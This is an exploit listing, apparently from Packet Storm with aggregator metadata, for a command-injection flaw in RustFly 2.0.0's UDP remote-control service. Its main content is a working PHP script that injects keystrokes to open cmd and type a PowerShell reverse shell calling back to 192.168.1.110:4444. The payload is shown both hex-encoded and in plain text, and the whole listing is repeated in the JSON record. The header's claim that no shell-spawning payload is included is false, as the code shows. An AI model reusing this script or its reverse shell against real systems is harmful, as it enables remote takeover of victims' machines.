📄 RustFly 2.0.0 Event Manipulation_PACKETSTORM:215819

Description

The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote system-level operations. Improper sanitization allows command-level injection. Version 2.0.0 is affected...

Visit Original Source

Basic Information

ID PACKETSTORM:215819

Published Feb 18, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : RustFly v2.0.0 - Event Manipulation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://bixat.dev/products/rustfly |
=============================================================================================================================================

[+] Summary : The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote
system-level operations. Improper sanitization allows command-level injection.

Steps To Reproduce:
-------------------
1) Configure IP and port of RustFly target.
2) Run this PHP PoC sender script.
3) Observe behavior change / message processing by RustFly.

=========================================================
PoC Impact:
-----------
* Proof of input injection capability
* Demonstrates command-carrier transport
* No shell-spawning payloads included (safe demonstration)

=========================================================
Instructions:
-------------
Save file as:
poc.php

Run:
php poc.php

<?php
$target_ip = "192.168.1.107";
$target_port = 5005;

$messages = [
"6D6F76653A2D35352C31303530", // move:-55,1050
"646F75626C655F636C69636B", // double_click
"746578743A636D64", // text:cmd
"6B65793A656E746572", // key:enter
// Warning: This is a PowerShell command to create a reverse shell - potentially harmful use
"746578743A706F7765727368656C6C202D6E6F70202D63202224633D4E65772D4F626A6563742053797374656D2E4E65742E536F636B6574732E544350436C69656E7428273139322E3136382E312E313130272C34343434293B24733D24632E47657453747265616D28293B5B627974655B5D5D24623D302E2E36353533357C257B307D3B7768696C65282824693D24732E526561642824622C302C24622E4C656E6774682929202D6E652030297B3B24643D284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E476574537472696E672824622C302C2469293B24723D69657820246420323E26313B24732E577269746528284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E4765744279746573282472202B20275053203E2027292C302C282472202B20275053203E2027292E4C656E677468297D22",
"6B65793A656E746572", // key:enter
];

$dangerous_powershell = hex2bin($messages[4]);
echo "=== Warning: Analyzing Dangerous Content ===\n";
echo "The PowerShell command encoded in hex is:\n";
echo $dangerous_powershell . "\n\n";

$decoded_ps = "powershell -nop -c \"\$c=New-Object System.Net.Sockets.TCPClient('192.168.1.110',4444);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){;\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=iex \$d 2>&1;\$s.Write((New-Object -TypeName System.Text.ASCIIEncoding).GetBytes(\$r + 'PS > '),0,(\$r + 'PS > ').Length)}\"";

echo "=== Security Warning ===\n";
echo "This code contains a dangerous PowerShell command:\n";
echo "--------------------------------------------------\n";
echo $decoded_ps . "\n";
echo "--------------------------------------------------\n\n";
echo "This command does:\n";
echo "1. Creates TCP connection to 192.168.1.110 on port 4444\n";
echo "2. Establishes a reverse shell (backdoor connection)\n";
echo "3. Executes any commands sent by the attacker\n";
echo "4. Returns results to the attacker\n\n";

echo "Do you want to continue? (yes/no): ";
$handle = fopen("php://stdin", "r");
$line = fgets($handle);
fclose($handle);

if(trim(strtolower($line)) != 'yes') {
echo "Operation cancelled.\n";
exit(0);
}

echo "Continuing...\n\n";

$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
if ($sock === false) {
echo "[-] Failed to create socket: " . socket_strerror(socket_last_error()) . "\n";
exit(1);
}

if (!socket_bind($sock, "0.0.0.0", 0)) {
echo "[-] Failed to bind socket: " . socket_strerror(socket_last_error()) . "\n";
socket_close($sock);
exit(1);
}

socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 5, "usec" => 0));

try {
foreach ($messages as $index => $msg) {

$binary_msg = hex2bin($msg);
if ($binary_msg === false) {
echo "[-] Invalid hex string: $msg\n";
continue;
}
$sent = socket_sendto($sock, $binary_msg, strlen($binary_msg), 0, $target_ip, $target_port);

if ($sent === false) {
echo "[-] Failed to send data: " . socket_strerror(socket_last_error()) . "\n";
} else {

$display_msg = preg_replace('/[^\x20-\x7E]/', '', $binary_msg);
echo "[+] Message " . ($index + 1) . " sent: $display_msg\n";

if ($index == 4) {
echo " Warning: Malicious PowerShell command sent!\n";
}
}

sleep(1);
}

echo "\n[+] All messages sent successfully.\n";
echo " Warning: If executed, the target machine will connect to 192.168.1.110:4444\n";

} catch (Exception $e) {
echo "[-] Exception: " . $e->getMessage() . "\n";
}

finally {
socket_close($sock);
echo "[*] Socket closed.\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-18T17:33:23",
    "description": "The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote system-level operations. Improper sanitization allows command-level injection. Version 2.0.0 is affected...",
    "published": "2026-02-18T00:00:00",
    "modified": "2026-02-18T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 RustFly 2.0.0 Event Manipulation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215819",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : RustFly v2.0.0 - Event Manipulation                                                                                         |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://bixat.dev/products/rustfly                                                                                          |\n    =============================================================================================================================================\n    \n    [+] Summary    : The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote\n                     system-level operations. Improper sanitization allows command-level injection.\n    \n    Steps To Reproduce:\n    -------------------\n    1) Configure IP and port of RustFly target.\n    2) Run this PHP PoC sender script.\n    3) Observe behavior change / message processing by RustFly.\n    \n    =========================================================\n    PoC Impact:\n    -----------\n    * Proof of input injection capability\n    * Demonstrates command-carrier transport\n    * No shell-spawning payloads included (safe demonstration)\n    \n    =========================================================\n    Instructions:\n    -------------\n    Save file as:\n        poc.php\n    \n    Run:\n        php poc.php\n    \n    <?php\n    $target_ip = \"192.168.1.107\";\n    $target_port = 5005;\n    \n    $messages = [\n        \"6D6F76653A2D35352C31303530\",  // move:-55,1050\n        \"646F75626C655F636C69636B\",     // double_click\n        \"746578743A636D64\",             // text:cmd\n        \"6B65793A656E746572\",           // key:enter\n        // Warning: This is a PowerShell command to create a reverse shell - potentially harmful use\n        \"746578743A706F7765727368656C6C202D6E6F70202D63202224633D4E65772D4F626A6563742053797374656D2E4E65742E536F636B6574732E544350436C69656E7428273139322E3136382E312E313130272C34343434293B24733D24632E47657453747265616D28293B5B627974655B5D5D24623D302E2E36353533357C257B307D3B7768696C65282824693D24732E526561642824622C302C24622E4C656E6774682929202D6E652030297B3B24643D284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E476574537472696E672824622C302C2469293B24723D69657820246420323E26313B24732E577269746528284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E4765744279746573282472202B20275053203E2027292C302C282472202B20275053203E2027292E4C656E677468297D22\",\n        \"6B65793A656E746572\",           // key:enter\n    ];\n    \n    $dangerous_powershell = hex2bin($messages[4]);\n    echo \"=== Warning: Analyzing Dangerous Content ===\\n\";\n    echo \"The PowerShell command encoded in hex is:\\n\";\n    echo $dangerous_powershell . \"\\n\\n\";\n    \n    $decoded_ps = \"powershell -nop -c \\\"\\$c=New-Object System.Net.Sockets.TCPClient('192.168.1.110',4444);\\$s=\\$c.GetStream();[byte[]]\\$b=0..65535|%{0};while((\\$i=\\$s.Read(\\$b,0,\\$b.Length)) -ne 0){;\\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\$b,0,\\$i);\\$r=iex \\$d 2>&1;\\$s.Write((New-Object -TypeName System.Text.ASCIIEncoding).GetBytes(\\$r + 'PS > '),0,(\\$r + 'PS > ').Length)}\\\"\";\n    \n    echo \"=== Security Warning ===\\n\";\n    echo \"This code contains a dangerous PowerShell command:\\n\";\n    echo \"--------------------------------------------------\\n\";\n    echo $decoded_ps . \"\\n\";\n    echo \"--------------------------------------------------\\n\\n\";\n    echo \"This command does:\\n\";\n    echo \"1. Creates TCP connection to 192.168.1.110 on port 4444\\n\";\n    echo \"2. Establishes a reverse shell (backdoor connection)\\n\";\n    echo \"3. Executes any commands sent by the attacker\\n\";\n    echo \"4. Returns results to the attacker\\n\\n\";\n    \n    echo \"Do you want to continue? (yes/no): \";\n    $handle = fopen(\"php://stdin\", \"r\");\n    $line = fgets($handle);\n    fclose($handle);\n    \n    if(trim(strtolower($line)) != 'yes') {\n        echo \"Operation cancelled.\\n\";\n        exit(0);\n    }\n    \n    echo \"Continuing...\\n\\n\";\n    \n    $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);\n    if ($sock === false) {\n        echo \"[-] Failed to create socket: \" . socket_strerror(socket_last_error()) . \"\\n\";\n        exit(1);\n    }\n    \n    if (!socket_bind($sock, \"0.0.0.0\", 0)) {\n        echo \"[-] Failed to bind socket: \" . socket_strerror(socket_last_error()) . \"\\n\";\n        socket_close($sock);\n        exit(1);\n    }\n    \n    socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, array(\"sec\" => 5, \"usec\" => 0));\n    \n    try {\n        foreach ($messages as $index => $msg) {\n    \n            $binary_msg = hex2bin($msg);\n            if ($binary_msg === false) {\n                echo \"[-] Invalid hex string: $msg\\n\";\n                continue;\n            }\n            $sent = socket_sendto($sock, $binary_msg, strlen($binary_msg), 0, $target_ip, $target_port);\n            \n            if ($sent === false) {\n                echo \"[-] Failed to send data: \" . socket_strerror(socket_last_error()) . \"\\n\";\n            } else {\n    \n                $display_msg = preg_replace('/[^\\x20-\\x7E]/', '', $binary_msg);\n                echo \"[+] Message \" . ($index + 1) . \" sent: $display_msg\\n\";\n    \n                if ($index == 4) {\n                    echo \" Warning: Malicious PowerShell command sent!\\n\";\n                }\n            }\n            \n            sleep(1);\n        }\n        \n        echo \"\\n[+] All messages sent successfully.\\n\";\n        echo \" Warning: If executed, the target machine will connect to 192.168.1.110:4444\\n\";\n        \n    } catch (Exception $e) {\n        echo \"[-] Exception: \" . $e->getMessage() . \"\\n\";\n    }\n    \n    finally {\n        socket_close($sock);\n        echo \"[*] Socket closed.\\n\";\n    }\n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215819",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215819/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply